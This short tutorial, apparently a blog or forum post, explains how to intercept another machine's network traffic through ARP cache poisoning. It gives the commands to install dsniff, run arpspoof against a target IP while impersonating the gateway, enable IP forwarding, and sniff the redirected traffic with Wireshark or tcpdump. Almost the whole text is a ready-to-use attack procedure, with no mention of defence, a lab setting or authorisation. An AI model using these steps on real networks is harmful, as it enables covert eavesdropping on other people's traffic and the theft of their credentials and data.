This is done from a Linux box, running Ubuntu 11.10
sudo apt-get install dsniff
This will install the arp spoofing tool “arpspoof” that we need to poison the ARP-cache. Run it like so:
sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>
All traffic will now end up on your computer. To automatically forward said traffic, run the following command:
sudo sysctl net.ipv4.conf.all.forwarding=1
Traffic is now being forwarded. To see if you already have this enabled, run this:
sysctl -a | grep forward
To disable it, just set forwarding=0
Now you can run Wireshark or tcpdump and sniff the traffic.